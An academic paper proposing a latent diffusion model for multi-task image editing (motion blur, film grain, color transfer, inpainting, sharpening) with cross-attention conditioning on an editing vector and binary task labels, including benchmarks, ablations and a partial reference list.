In this paper, we focus on the problem of multi-task image editing, which aims to learn a single model for multiple image-to-image translation tasks. Such a problem is exceptionally challenging as the model needs to learn a shared feature space and simultaneously disentangle each task for multi-task editing capabilities. On top of that, given a set of $N$ editing tasks, there are $\sum_{k=1}^{N} \binom{N}{k}$ target task combinations. As such, providing all possible combinations in the training data becomes intractable, especially with an increasing number of editing tasks.

To tackle the above limitations, we propose a multi-task image-to-image diffusion-based framework that is trained on single-task editing data but generalizes to multi-task edits. Specifically, we design a novel multi-modal input conditioning formulation that provides explicit user control over each task. It includes image conditions applied via image concatenation and an editing vector condition applied via cross-attention features. While cross-attention-based conditioning has been proposed before (Rombach et al., 2022), it has mainly been applied to text-to-image diffusion models to allow for generalizing to complex text prompts. In our formulation, the editing vector condition represents task-specific editing handlers to provide explicit fine-grained user control over each task. We also add binary task activation labels, represented as one-hot encodings, to the input editing vector. We observe that cross-attention-based conditioning and explicit binary labels are key to allowing the model to generalize to combined tasks.

We train our model on different image editing/compositing tasks, including motion blur synthesis, film grain synthesis, color transfer, inpainting, and sharpening. We remark that motion blur and film grain synthesis are less explored in the literature. However, they are of prime importance for practical use in professional pipelines, e.g., film post-production and VFX, as it is non-trivial to synthesize these effects with fine control and ensure naturally-looking results in multi-task editing setups. Our proposed input conditioning provides explicit task activation and user control, including the level of motion blur, the size of film grain, the reference image for colorization, the amount of sharpness, and the inpainting region. We provide extensive experimental results to show that our method outperforms existing baselines. Our main contributions can be summarized as follows:

- We propose a novel diffusion-based architecture for multi-task image-to-image translation problems, providing users with fine-grained control over each task.
- We propose a novel conditioning formulation that allows the model trained on data with single-task edits to generalize well to multi-task editing.
- We identify that an explicit binary task activation vector and cross-attention-based conditioning are key to model generalization.
- Our approach yields competitive results on single-task editing and state-of-the-art results for multi-task editing. It also generalizes to novel datasets not viewed at training time.
- We introduce a novel benchmark dataset based on REDS (Nah et al., 2019) with standard image metrics for advancing the state of the art.

2 RELATED WORK

**Image-to-image translation.** Historically, Generative Adversarial Networks (GANs) (Goodfellow et al., 2014; Radford et al., 2015; Creswell et al., 2018; Brock et al., 2018) have been a popular architectural choice for image-to-image translation tasks. Such tasks have been attempted by conditional generative models (Isola et al., 2017; Wang et al., 2018; Kim et al., 2020) with success across a wide variety of domains, such as semantic labels to photo-real images or colorization. However, this requires a separate paired dataset per task and a separate model for each task. Other methods apply edits within the GAN latent space (Shen et al., 2020; Kim et al., 2021) using vector arithmetic. This can yield interesting results due to the disentangled nature of the latent space of a well-trained GAN. However, it does not allow fine-grained control of attributes and is prone to artifacts. GAN inversion (Xia et al., 2021) has also been used to create paired data for the conditional generative paradigm when this is not feasible to obtain (Wu et al., 2022). This suffers from similar drawbacks, namely artifacts in the output and the limited ability of the encoder to encode the source image into the latent space. GANs have additionally been used for style transfer (Taigman et al., 2017; Liu et al., 2019), for example with CycleGANs (Zhu et al., 2017), where a cycle consistency loss is enforced to map between a source image domain and a target domain in an unsupervised manner. This overcomes the limitation of requiring paired data, but it does not allow for fine-grained control of the image modification. Compositing effects, such as motion blur (Luo et al., 2018) and film grain addition or removal (Ameur et al., 2023), are less explored, and we seek to remedy this in our proposed method.

**Diffusion techniques.** Diffusion models (Sohl-Dickstein et al., 2015) have received considerable attention since their initial conception and deployment for image generation (Ho et al., 2020; Nichol & Dhariwal, 2021; Ho et al., 2022; Song et al., 2022a; Rombach et al., 2022), as they produce very high-quality samples, are more stable during training, and are capable of more diverse image generation than GANs. They have shown good performance on several image restoration tasks (Kadkhodaie & Simoncelli, 2021; Sasaki et al., 2021; Kawar et al., 2022a; Saharia et al., 2022c; Zhu et al., 2023; Murata et al., 2023), although multi-task editing is less explored. For multi-task editing without re-training the diffusion model for each task, guidance from an external classifier or regression model can be added at sampling time (Wolleb et al., 2022; Ho & Salimans, 2022; Kawar et al., 2022b). Text-based editing (Ramesh et al., 2022; Saharia et al., 2022b; Rombach et al., 2022) seeks to control the structure of a generated image, which can be achieved by using spatial attention maps generated from a reference prompt to edit part of the generated image (Hertz et al., 2022; Tumanyan et al., 2023).
While designed for synthetic images, real images can be edited through inversion. However, this does not always produce an accurate result (Zhang et al., 2023). Further research uses inversion to create paired training data for a conditional model (Brooks et al., 2023). While this allows generalization to real images, it does not support fine-grained control. For more advanced control of text-to-image models, e.g., with segmentation or edge maps, a hypernetwork-adjacent architecture can be used (Zhang & Agrawala, 2023). However, paired training data is still required, and multi-task conditioning was not investigated. An end-to-end approach, which may be more desirable, has been accomplished with adapted text-to-image models that use latent embeddings of an object created with a vision transformer (Song et al., 2022b). Although this retains the object's semantics and holistically matches its color, lighting, etc. in the scene, it does not retain the fine detail of the image and gives little control to the user.

**Multi-task image editing.** As training a model for each domain would be intractable when building large-scale pipelines, the "multi-task" approach capable of editing within many domains has great value within image-to-image editing (Yu et al., 2018; Qian et al., 2022). Some approaches seek to accomplish this with a GAN-based framework through additional class labels (Choi et al., 2018) or mapping networks (Choi et al., 2020). This adds computational overhead and complexity to the training. It also adds additional modes to the network; GANs are known to drop modes or collapse entirely to only one mode (Zhang et al., 2018b). To alleviate these issues, other work (Saharia et al., 2022a) uses diffusion models that more completely represent all the modes found in the data distribution. Palette introduces a diffusion model trained on a dataset exhibiting various image degradations with the goal of a generalist model capable of multiple tasks (colorization, inpainting, uncropping, and JPEG restoration). Although it shows the success of training diffusion models on multiple tasks simultaneously, it does not fully specify the task at training time, and therefore, there is a lack of control over the type and amount of the image restoration. Our approach builds on this work by introducing additional conditioning to the model for more fine-grained control of the output.

### 3 METHOD

Our task is to train a single diffusion model on multiple image-to-image translation tasks simultaneously, with fine-grained user control over each individual task.

#### 3.1 IMAGE-TO-IMAGE DIFFUSION MODELS

First, we briefly overview our baseline framework derived from Palette (Saharia et al., 2022a), which in turn builds upon conditional diffusion models for image-to-image translation. Please refer to the supplementary document for a general introduction to diffusion models. Conditional diffusion models can be expressed as a sequence of denoising autoencoders \( \epsilon_\theta(x, y_t, t) \), where \( y_t \) is the noisy version of \( y \) at diffusion time step \( t \). The conditioning on the source image \( x \) is applied by concatenating \( y_t \) with \( x \). Palette's loss is defined as:

\[
L_{Pal} = \mathbb{E}_{x, y, \epsilon \sim \mathcal{N}(0,I), t} \left[ \| \epsilon_\theta(x, y_t, t) - \epsilon \|_2^2 \right],
\]

where \( y_t = \sqrt{\alpha_t} y + \sqrt{1 - \alpha_t} \epsilon \), with \( \alpha_t \) being the noise level indicator at time step \( t \).
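As an illustration of this objective, a minimal PyTorch training step for an image-conditioned denoiser might look as follows. This is a sketch under our own assumptions (`eps_model` stands for \( \epsilon_\theta \) and takes the channel-wise concatenation of the source image and the noisy target), not the authors' implementation:

```python
import torch

def palette_training_step(eps_model, x_src, y_tgt, alphas_cumprod):
    """One denoising step: predict the noise added to y at a random
    timestep t, conditioned on the source image x."""
    b = y_tgt.shape[0]
    t = torch.randint(0, len(alphas_cumprod), (b,), device=y_tgt.device)
    a_t = alphas_cumprod[t].view(b, 1, 1, 1)           # noise-level indicator
    eps = torch.randn_like(y_tgt)
    y_t = a_t.sqrt() * y_tgt + (1 - a_t).sqrt() * eps  # noisy target
    # source conditioning applied by channel-wise concatenation
    eps_pred = eps_model(torch.cat([x_src, y_t], dim=1), t)
    return ((eps_pred - eps) ** 2).mean()              # L2 denoising loss
```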
### 3.2 Multi-task Image-to-image Diffusion Models

Multi-task learning has been briefly discussed in Palette (Saharia et al., 2022a). The multi-task Palette model is trained simultaneously on four tasks: colorization, inpainting, uncropping, and JPEG restoration. This multi-task framework shares the same architecture as the task-specific one, conditioned directly on the input image. Although the multi-task Palette model achieves results comparable to task-specific models, it provides no user control over each task. Furthermore, the multi-task Palette model learns to map four different domains into the same domain of natural images, akin to an N-to-1 mapping. Note that its current conditioning design does not allow an N-to-N mapping either.

To address these concerns, we design a multi-task image-to-image diffusion model that allows explicit fine-grained control over each task. We train the model simultaneously on five image-to-image translation tasks commonly used in film production pipelines: motion blur synthesis, film grain synthesis, color transfer, inpainting, and sharpening. We realize these tasks within a single model, i.e., our model is trained to learn an N-to-N mapping.

#### Architecture. The architecture of our proposed multi-task image-to-image diffusion model is detailed in Fig. 1. We extend the Palette model to the state-of-the-art Latent Diffusion Models (LDMs) (Rombach et al., 2022), where the diffusion models are trained in the latent space of a pretrained perceptual compression model. As shown in Fig. 1, the source image is denoted by \( I_A \), and the target image is denoted by \( I_B \). We use \( VQ \) to denote the pretrained autoencoder. The latent codes corresponding to \( I_A \) and \( I_B \) are denoted by \( z_0^A \) and \( z_0^B \), respectively. Following LDMs, we train the diffusion models in the latent space of \( VQ \). Hence, the objective is to learn the target latent code \( z_0^B \) from the source latent code \( z_0^A \), using the color reference image \( I_{ref} \) and the editing vector \( C \). The loss function is expressed as follows:

\[
L = \mathbb{E}_{z^A, z^B, I_{ref}, C, \epsilon \sim \mathcal{N}(0,I), t} \left[ \| \epsilon_\theta(z^A_0, I_{ref}, C, z^B_t, t) - \epsilon \|_p \right],
\]

where \( p = 1 \). Although the \( \ell_2 \) norm favors sample diversity (Saharia et al., 2022a), our experimental results show that the \( \ell_1 \) norm attains better reconstruction quality.

#### Conditioning. One of the core differences between our architecture and Palette's is the input conditioning. Palette is conditioned solely on the source image. To provide better control for end users, we add additional input conditions for each task: blur degree \( \beta \) for motion blur synthesis, grain size \( \sigma \) for film grain synthesis, color reference image \( I_{ref} \) for color transfer, inpainting mask \( M \) for inpainting, and sharpening amount \( \lambda \) and threshold \( \mu \) for the sharpening task. In addition, we include binary task activation labels, i.e., one-hot encodings, to indicate whether the corresponding task is active.

Table 1: Summary of our input conditioning.

| Via Concatenation | Via Cross-attention |
|-------------------|---------------------|
| Input image: \( I_A \) | blur degree: \( \beta \in [0, 1] \) |
| Color reference: \( I_{ref} \) | grain size: \( \sigma \in [0, 0.1] \) |
| | sharp. amount: \( \lambda \in [1, 3] \) |
| | sharp. threshold: \( \mu \in [0, 0.1] \) |
| | bin. task labels: \( [e_1, e_2, e_3, e_4, e_5] \) |

The scaling factors \([\beta, \sigma, \lambda, \mu]\) and the binary task activation vector \([e_1, e_2, e_3, e_4, e_5]\) are concatenated into an editing vector \(C = [\beta, \sigma, \lambda, \mu, e_1, e_2, e_3, e_4, e_5]\).
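For illustration, constructing this 9-dimensional editing vector could look as follows (a minimal sketch; the function name and argument order are our own assumptions):

```python
import torch

def edit_vector(beta, sigma, lam, mu, e):
    # e = [e1..e5]: binary activation labels for
    # [blur, grain, color transfer, inpainting, sharpening]
    return torch.tensor([beta, sigma, lam, mu] + list(e), dtype=torch.float32)

# e.g., motion blur only, at half strength (inactive controls are zeroed
# at training time, as described in Sec. 4.1):
# C = edit_vector(beta=0.5, sigma=0.0, lam=0.0, mu=0.0, e=[1, 0, 0, 0, 0])
```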
Our proposed model is conditioned on the source latent code \(z^A_0\), the color reference image \(I_{ref}\), and the editing vector \(C\). As such, our model employs multi-modal input conditioning. Note that the conditioning on the source latent code \(z^A_0\) and the color reference \(I_{ref}\) is applied via concatenation. For the color reference conditioning, we use the RGB image \(I_{ref}\) down-sampled to the spatial size of \(z^A_0\), since we find that RGB input conditioning yields more accurate color transfer than compressed conditioning. In view of the high-quality results achieved by recent text-to-image diffusion models, we apply the editing vector \(C\) using a cross-attention conditioning mechanism, as proposed by Rombach et al. (2022). Tab. 1 gives a clear summary of our conditioning. The editing vector \(C\) is passed through a mapping network \(f_\theta\) to obtain features, which are in turn passed into the cross-attention layers of the denoising U-Net. The mapping network \(f_\theta\) is realized as two linear layers with an in-between sigmoid linear unit activation. The VQ autoencoder and the denoising U-Net are initialized from a pretrained text-to-image model (Rombach et al., 2022).

### 4 RESULTS

#### 4.1 IMPLEMENTATION DETAILS

**Datasets.** We build upon the REalistic and Dynamic Scenes (REDS) dataset (Nah et al., 2019) to create a custom dataset for training. REDS contains 300 videos (1280 × 720 resolution), collected for video deblurring and super-resolution tasks. We use a [240-30-30] split for training, validation, and testing, respectively. Each video sequence contains 100 pairs of sharp and blurry frames. To process our custom dataset, we crop a 256 × 256 patch randomly from each pair of frames. As a result, we obtain cropped pairs of {sharp, motion blur} images. We utilize off-the-shelf algorithms to synthesize editing effects for the other tasks. We run the method proposed by Newson et al. (2017) for film grain synthesis. Following Ameur et al. (2022), we generate grain effects for each sharp image at five different radii {0.010, 0.025, 0.050, 0.075, 0.100}. We adopt the algorithm proposed by Reinhard et al. (2001) for global color transfer. The color reference image is another sharp image randomly selected from the training set. For the inpainting task, we utilize the algorithm proposed by Yu et al. (2019) to generate free-form masks for each sharp image. Finally, for the sharpening task, we apply the unsharp masking formula (Polesel et al., 2000) given a user-defined sharpness intensity and threshold. Please refer to the supplementary document for further implementation details on the generation of our synthetic editing effects.

**Training.** Our model is trained on a single NVIDIA A10 GPU with 24GB of memory, using a batch size of 12 for 45K training steps. At each training step, each sharp image in the batch is randomly labeled with a binary vector "[w/ blur, w/ grain, w/ color transfer, w/ inpainting, w/ sharpening]", indicating whether a given task is on or off. The label vector is randomly drawn from {[0, 0, 0, 0, 0], [1, 0, 0, 0, 0], [0, 1, 0, 0, 0], [0, 0, 1, 0, 0], [0, 0, 0, 1, 0], [0, 0, 0, 0, 1]}. Note that the input conditioning is set to zero for each inactive task. For instance, if the color transfer task is off, the color reference image \(I_{ref}\) will be set to zero. If the inpainting task is on, \(I_A\) will be multiplied by the free-form mask \(M\).
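The mapping network and the training-time task labeling described in this section could be sketched as follows; this is a hedged illustration where the layer widths, context dimension, and all names are our assumptions:

```python
import random
import torch
import torch.nn as nn

class EditVectorMapper(nn.Module):
    """f_theta: two linear layers with an in-between SiLU, mapping the
    9-dim editing vector C to context features for cross-attention."""
    def __init__(self, ctx_dim=768, hidden=256):
        super().__init__()
        self.net = nn.Sequential(nn.Linear(9, hidden), nn.SiLU(),
                                 nn.Linear(hidden, ctx_dim))

    def forward(self, c):                 # c: [B, 9] editing vectors
        return self.net(c).unsqueeze(1)   # [B, 1, ctx_dim] context tokens

# Single-task (or identity) label vectors, as listed in the training paragraph:
TASK_LABELS = [[0, 0, 0, 0, 0], [1, 0, 0, 0, 0], [0, 1, 0, 0, 0],
               [0, 0, 1, 0, 0], [0, 0, 0, 1, 0], [0, 0, 0, 0, 1]]

def sample_conditioning(beta, sigma, lam, mu, I_ref, mask, I_A):
    e = random.choice(TASK_LABELS)
    # zero out the control of every inactive task
    c = torch.tensor([beta * e[0], sigma * e[1], lam * e[4], mu * e[4]] + e,
                     dtype=torch.float32)        # editing vector C
    I_ref_c = I_ref if e[2] else torch.zeros_like(I_ref)
    I_A_c = I_A * mask if e[3] else I_A          # inpainting: mask the input
    return c, I_ref_c, I_A_c
```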
#### 4.2 QUANTITATIVE EVALUATION

**Evaluation metrics.** We evaluate our approach and baseline methods on image editing using four image metrics: \(\ell_1\) distance, Structural SIMilarity (SSIM) (Wang et al., 2004), Learned Perceptual Image Patch Similarity (LPIPS) (Zhang et al., 2018a), and Kernel Inception Distance (KID) (Binkowski et al., 2018). We run both pixel-level and perceptual metrics in our experiments for a fair comparison.

We evaluate the proposed multi-task image-to-image diffusion models on the test set of our custom dataset. We compare our method with a baseline framework derived from Palette (Saharia et al., 2022a), which we refer to as Palette++¹, and a GAN-based method, pix2pix (Isola et al., 2017). For a fair comparison, we implement the Palette++ framework in the latent space of the same pretrained autoencoder, based on the latent diffusion model (Rombach et al., 2022), and provide the model with all of the additional proposed input conditioning. The input conditioning is a concatenated tensor containing the latent code of the input image, the color reference image downsampled to the latent spatial size, and the editing vector expanded to the latent spatial size.

¹We refer to this modified version as Palette++.

Table 2: Quantitative evaluation on single-task image editing. Results on our test dataset for each task: blur, grain, color transfer, inpainting, and sharpening. Each cell reports \(\ell_1\) ERR.↓ / SSIM↑ / LPIPS↓ / KID↓. Blue denotes our proposed model.

| MODEL | MOTION BLUR | FILM GRAIN |
|---|---|---|
| pix2pix | 0.052 / 0.898 / 0.202 / 7.239 | 0.088 / 0.843 / 0.248 / 17.502 |
| PALETTE++ | 0.062 / 0.880 / 0.198 / 1.855 | 0.058 / 0.886 / 0.104 / 1.728 |
| OURS - SINGLE | 0.059 / 0.885 / 0.194 / 1.544 | 0.057 / 0.887 / 0.100 / 1.464 |
| OURS - MULT. | 0.061 / 0.881 / 0.194 / 1.854 | 0.058 / 0.886 / 0.104 / 1.765 |

| MODEL | COLOR TRANSFER | INPAINTING |
|---|---|---|
| pix2pix | 0.236 / 0.647 / 0.426 / 54.206 | 0.080 / 0.916 / 0.261 / 11.312 |
| PALETTE++ | 0.074 / 0.908 / 0.094 / 1.369 | 0.075 / 0.860 / 0.128 / 3.203 |
| OURS - SINGLE | 0.064 / 0.922 / 0.083 / 1.390 | 0.073 / 0.869 / 0.119 / 1.856 |
| OURS - MULT. | 0.074 / 0.908 / 0.093 / 1.385 | 0.076 / 0.857 / 0.130 / 3.391 |

| MODEL | SHARPENING |
|---|---|
| pix2pix | 0.143 / 0.789 / 0.461 / 29.630 |
| PALETTE++ | 0.085 / 0.921 / 0.104 / 1.789 |
| OURS - SINGLE | 0.084 / 0.921 / 0.102 / 1.807 |
| OURS - MULT. | 0.084 / 0.921 / 0.104 / 1.773 |

Table 3: Quantitative evaluation on multi-task image editing. Results on our test dataset for the combined tasks. Each cell reports \(\ell_1\) ERR.↓ / SSIM↑ / LPIPS↓ / KID↓. The multi-task editing results of our model trained on single edits (denoted by OURS - SINGLE) are generated by sequentially applying each task-specific model. Blue denotes our proposed model.

| MODEL | BLUR + FILM GRAIN | BLUR + FILM GRAIN + COLOR TRAN. |
|---|---|---|
| pix2pix | 0.103 / 0.861 / 0.354 / 16.775 | 0.541 / 0.139 / 0.754 / 30.458 |
| PALETTE++ | 0.074 / 0.803 / 0.099 / 12.257 | 0.194 / 0.608 / 0.434 / 14.214 |
| OURS - SINGLE | 0.088 / 0.763 / 0.261 / 10.578 | 0.160 / 0.564 / 0.463 / 38.823 |
| OURS - MULT. | 0.073 / 0.815 / 0.246 / 6.829 | 0.142 / 0.697 / 0.373 / 12.421 |

| MODEL | FILM GRAIN + COLOR TRAN. | FILM GRAIN + COLOR TRAN. + SHARPEN |
|---|---|---|
| pix2pix | 0.438 / 0.303 / 0.598 / 50.473 | 0.562 / 0.111 / 0.855 / 37.482 |
| PALETTE++ | 0.134 / 0.753 / 0.293 / 8.261 | 0.206 / 0.642 / 0.355 / 8.992 |
| OURS - SINGLE | 0.111 / 0.737 / 0.262 / 15.494 | 0.188 / 0.585 / 0.455 / 54.575 |
| OURS - MULT. | 0.107 / 0.799 / 0.232 / 5.149 | 0.151 / 0.742 / 0.315 / 6.695 |
As for pix2pix, we adapt the input conditioning to include all the necessary information: the input conditioning is a concatenated tensor containing the input image, the color reference image, and the editing vector expanded to the input spatial size. We train all three methods on the same training set for the same number of epochs.

**Single-task image-to-image translation.** Tab. 2 reports quantitative evaluation results on each image editing task. We add our model trained on single-task data as an additional baseline for comparison. This model is denoted by "Ours - single" in Tab. 2; a separate model is trained for each single task and applied independently at inference. Pix2pix performs well on motion blur synthesis but not on the other tasks, indicating that the model might be overfitting to a specific task during multi-task training. Our final model trained on multi-task edits performs comparably to Palette++ and "Ours - single". Thus, our proposed multi-task approach preserves accuracy on single tasks.

**Multi-task image-to-image translation.** Tab. 3 reports quantitative evaluation results on multiple image editing tasks. For our model trained on single-task data, we apply each task-specific model sequentially to obtain multi-task edits. Our method outperforms the other three approaches by a large margin. This demonstrates that inserting the conditioning via cross-attention layers promotes disentanglement and helps handle multi-task editing. Note that our model generalizes well to multi-task editing despite only being trained on single tasks.

#### 4.3 Qualitative Evaluation

**State-of-the-art Comparison.** We visually compare our method with Palette++ and pix2pix. Fig. 2 presents image editing results on single tasks, while Fig. 3 shows multi-task image editing results. Pix2pix yields noticeable artifacts under the multi-task training setup. Our method yields comparable or better results than Palette++ for single-task image editing. For multi-task image editing, our results outperform Palette++, our model trained on single edits, and especially pix2pix, by a large margin. Fig. 3 shows that our method succeeds in transferring color when three tasks, e.g., blur, grain, and color transfer, are combined altogether. Overall, our method matches the ground truth better.

Figure 2: Qualitative comparison on single-task image editing.

Figure 3: Qualitative comparison on multi-task image editing. We evaluate the following combined tasks: blur + grain, blur + grain + color transfer, grain + color transfer, and film grain + color transfer + sharpening.

**Fine-grained user editing control.** Fig. 4 presents fine-grained progressive editing results for single- and multi-task editing. Editing results were attained by progressively increasing the intensity level of the target effect (motion blur, film grain, sharpening) or randomly switching the reference image (color transfer). The bottom row shows that our model can provide fine-grained control in the multi-task setup as well.
Please refer to the supplementary document for more comprehensive experiments on single- and multi-task user editing control.

**Generalization to unseen datasets.** Our method also has good generalization capabilities to unseen datasets. Fig. 5 presents single- and multi-task editing results on the FFHQ (Karras et al., 2019) and Stanford Cars (Krause et al., 2013) datasets, generated by the model trained on our custom dataset. Our model yields plausible editing results for single-task editing, e.g., blur, grain, and sharpening. We also show results on multi-task editing: blur and grain; color transfer and grain; and color transfer, grain, and sharpening. As can be observed from Fig. 5, the same blur degree is given to generate the results in columns 2 and 4. Our results show more consistent blur strength compared to those of the Palette++ baseline. For the last three columns, the same reference image is given for the color transfer task. Our results show more consistent colorization than Palette++.

Figure 4: Fine-grained user control on single- and multi-task editing. Editing results were attained by progressively increasing the intensity level of the target effect (motion blur and film grain), applying various arbitrary inpainting mask regions (inpainting), or randomly switching the reference image (color transfer).

Figure 5: Multi-task editing results on unseen datasets. We show single- and multi-task editing results on FFHQ (Karras et al., 2019) and Stanford Cars (Krause et al., 2013) using the model trained on our custom dataset.

#### 4.4 Ablative Analysis

**Binary task activation labels.** The editing vector $C$ consists of the scaling factors $[\beta, \sigma, \lambda, \mu]$ and the binary task labels corresponding to each task's activation status. Intuitively, these labels might seem redundant since they are implicit in the input vector, e.g., blur degree $\beta = 0$ indicates that the motion blur task is disabled. We perform an ablation study to understand their influence on the results, as illustrated in Tab. 4. The binary task activation labels (our approach) slightly improve single-task editing and, by promoting task disentanglement, boost overall performance for multi-task editing.

**Depth of $f_\theta$.** We remark that our architecture's mapping network $f_\theta$ contains two linear layers. Tab. 4 shows quantitatively that this is an optimal choice for the number of layers. We observe that for the case of editing a single task, using a deeper $f_\theta$ yields slightly better results. As for multi-task editing, a performance drop is observed when increasing the number of layers. Hence, we utilize two layers as a balanced trade-off between single- and multi-task editing.

### 5 Discussion

**Limitations.** Although our approach yields good editing results in multi-task cases, task disentanglement is not fully achieved. For instance, Fig. 5 shows color transfer results in the three far-right columns. The results in the last two columns (multi-task editing setup) show that the hue intensity slightly differs from that of column 6 (single-task editing setup). This means that the color transfer task is still somewhat entangled with the graining and sharpening tasks. In addition, we notice that our model fails at the inpainting task when performing multi-task editing. The reason may be that all of the other four tasks are global editing effects, whereas inpainting is a local edit. Tab. 3 also confirms that multi-task editing obtains higher error metrics than single-task editing.
Our approach also lacks pixel-wise crispness, inherited from the sampling process of diffusion models. At each sampling step, slight errors accumulate, resulting in inaccuracies in the synthesized output. Alternative image editing methods have been proposed for inverting existing high-quality images to the latent space of diffusion models (Dhariwal & Nichol, 2021; Song et al., 2022a; Mokady et al., 2023). We have tried DDIM inversion (Dhariwal & Nichol, 2021) to obtain the initial noise features from an input image. However, we observe that the obtained noise features are more difficult to edit than randomly initialized noise features, thus resulting in worse image quality. Please refer to the supplementary for qualitative results.

Table 4: Ablation study for architecture choices. Blue denotes our proposed model.

| Model | $\ell_1$ ERR.↓ | SSIM↑ | LPIPS↓ | KID↓ |
|----------------|----------------|-------|--------|------|
| | BLUR | | | |
| W/O BINARY LABELS | 0.061 | 0.881 | 0.201 | 2.014 |
| W/ BINARY LABELS | 0.061 | 0.881 | 0.199 | **1.854** |
| $f_\theta$ - 0 LAYERS | 0.061 | 0.880 | 0.201 | 2.078 |
| $f_\theta$ - 1 LAYER | 0.061 | 0.881 | 0.199 | 1.957 |
| $f_\theta$ - 2 LAYERS | 0.061 | 0.881 | 0.199 | **1.854** |
| $f_\theta$ - 4 LAYERS | 0.061 | 0.882 | 0.198 | **1.818** |
| | BLUR + GRAIN + COLOR | | | |
| W/O BINARY LABELS | 0.240 | 0.581 | 0.443 | 17.639 |
| W/ BINARY LABELS | 0.142 | **0.697** | **0.373** | **12.421** |
| $f_\theta$ - 0 LAYERS | 0.198 | 0.621 | 0.374 | 14.620 |
| $f_\theta$ - 1 LAYER | 0.165 | 0.657 | **0.369** | **12.046** |
| $f_\theta$ - 2 LAYERS | 0.142 | **0.697** | 0.373 | 12.421 |
| $f_\theta$ - 4 LAYERS | 0.152 | 0.650 | 0.413 | 20.718 |

Table 5: Quantitative evaluation on contrastive learning (N-pair loss). Blue denotes our proposed model. Config A and B refer to the contrastive N-pair loss applied to bottleneck features and label features, respectively.

| Model | $\ell_1$ ERR.↓ | SSIM↑ | LPIPS↓ | KID↓ |
|----------------|----------------|-------|--------|------|
| | BLUR | | | |
| + N-PAIR - CONFIG A | 0.062 | 0.877 | 0.205 | 2.348 |
| + N-PAIR - CONFIG B | 0.062 | 0.880 | 0.200 | 1.923 |
| OURS - MULT. | **0.061** | **0.881** | **0.199** | **1.854** |
| | BLUR + FILM GRAIN | | | |
| + N-PAIR - CONFIG A | 0.073 | 0.798 | 0.277 | 10.662 |
| + N-PAIR - CONFIG B | 0.088 | 0.738 | 0.366 | 43.615 |
| OURS - MULT. | **0.073** | **0.815** | **0.246** | **6.829** |
| | BLUR + FILM GRAIN + COLOR TRAN. | | | |
| + N-PAIR - CONFIG A | 0.058 | 0.885 | 0.107 | 2.236 |
| + N-PAIR - CONFIG B | 0.057 | **0.891** | 0.120 | 1.851 |
| OURS - MULT. | 0.058 | 0.886 | **0.104** | **1.765** |

**Disentanglement.** We have explored different constraints to enhance feature disentanglement for multi-task editing. In particular, we have tried different contrastive learning approaches, adopting the N-pair loss used in Aksoy et al. (2018), where the loss function is defined as:

$$L_{N\text{-}pair} = \frac{1}{|\mathcal{P}|} \sum_{p,q \in \mathcal{P}} \left[ I[l_p = l_q] \log \left( \frac{1 + \exp(\|f_p - f_q\|)}{2} \right) + I[l_p \neq l_q] \log \left( 1 + \exp(-\|f_p - f_q\|)/2 \right) \right].$$

This N-pair loss is applied within each batch, where $\mathcal{P}$ denotes the batch of samples, $l_p$ refers to the binary task activation vector of sample $p$, and $f_p$ denotes the corresponding features. Here, $I[\cdot]$ returns 1 if the condition is true and 0 otherwise.
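A minimal PyTorch rendering of this batch-wise N-pair term follows; this is our own reading of the parenthesization above, with feature and label names assumed:

```python
import torch

def n_pair_loss(feats, labels):
    # feats: [B, d] features f_p; labels: [B, k] binary task-activation vectors
    d = torch.cdist(feats, feats, p=2)                  # ||f_p - f_q||
    same = (labels.unsqueeze(0) == labels.unsqueeze(1)).all(-1).float()
    pos = torch.log((1 + torch.exp(d)) / 2)             # pull same-label pairs
    neg = torch.log(1 + torch.exp(-d) / 2)              # push different-label pairs
    loss = same * pos + (1 - same) * neg
    return loss.sum() / feats.shape[0]                  # 1/|P| normalization
```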
We added the N-pair loss to the training objective in our experiments to enhance disentanglement. As for the choice of $f_p$, we tested both the bottleneck features of the denoising U-Net and the label features $f_\theta(C)$. However, the results in Tab. 5 show that there are no noticeable improvements over the baseline on single-task edits, and even a drop in performance on multi-task edits. Please refer to the supplementary for further analysis.

### 6 CONCLUSION

We demonstrated that multi-task diffusion models can be effective in learning image representations for various photo filter effects, such as motion blur, film grain, sharpening, colorization, and image inpainting. In particular, we show that the learned representation enables novel domain generalization towards unseen data distributions and more fine-grained control over generated images, even when the model is trained only on individual tasks. We achieve this by introducing the binary task activation vector and cross-attention operations over the given input tasks into the proposed conditional diffusion probabilistic formulation. Our formulation also leads to improved performance in extensive evaluations and comparisons against state-of-the-art multi-task image editing methods. Task-level feature disentanglement still remains challenging and an interesting research direction. We believe that there will be more advanced solutions for improved task disentanglement, such as task batch scheduling and/or more sophisticated contrastive losses, in the future.

REFERENCES

Yağız Aksoy, Tae-Hyun Oh, Sylvain Paris, Marc Pollefeys, and Wojciech Matusik. Semantic soft segmentation. *ACM TOG*, 37(4):1–13, 2018.

Zoubida Ameur, Wassim Hamidouche, Edouard François, Miloš Radosavljević, Daniel Menard, and Claire-Hélène Demarty. Deep-based film grain removal and synthesis. *arXiv preprint arXiv:2206.07411*, 2022.

Zoubida Ameur, Wassim Hamidouche, Edouard François, Miloš Radosavljević, Daniel Menard, and Claire-Hélène Demarty. Deep-based film grain removal and synthesis. *IEEE Transactions on Image Processing*, 2023.

Omri Avrahami, Dani Lischinski, and Ohad Fried. Blended diffusion for text-driven editing of natural images. In *CVPR*, pp. 18208–18218, 2022.

Mikolaj Binkowski, Danica J. Sutherland, Michael Arbel, and Arthur Gretton. Demystifying MMD gans. In *ICLR*. OpenReview.net, 2018.

Andrew Brock, Jeff Donahue, and Karen Simonyan. Large scale gan training for high fidelity natural image synthesis. *arXiv preprint arXiv:1809.11096*, 2018.

Tim Brooks, Aleksander Holynski, and Alexei A Efros. Instructpix2pix: Learning to follow image editing instructions. In *CVPR*, pp. 18392–18402, 2023.

Yunjey Choi, Minje Choi, Munyoung Kim, Jung-Woo Ha, Sunghun Kim, and Jaegul Choo. Stargan: Unified generative adversarial networks for multi-domain image-to-image translation. In *CVPR*, pp. 8789–8797, 2018.

Yunjey Choi, Youngjung Uh, Jaejun Yoo, and Jung-Woo Ha. Stargan v2: Diverse image synthesis for multiple domains. In *CVPR*, pp. 8188–8197, 2020.

Antonia Creswell, Tom White, Vincent Dumoulin, Kai Arulkumaran, Biswa Sengupta, and Anil A. Bharath. Generative adversarial networks: An overview. *IEEE Signal Processing Magazine*, 35(1):53–65, 2018. doi: 10.1109/MSP.2017.2765202.

Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. Bert: Pre-training of deep bidirectional transformers for language understanding. *arXiv preprint arXiv:1810.04805*, 2018.

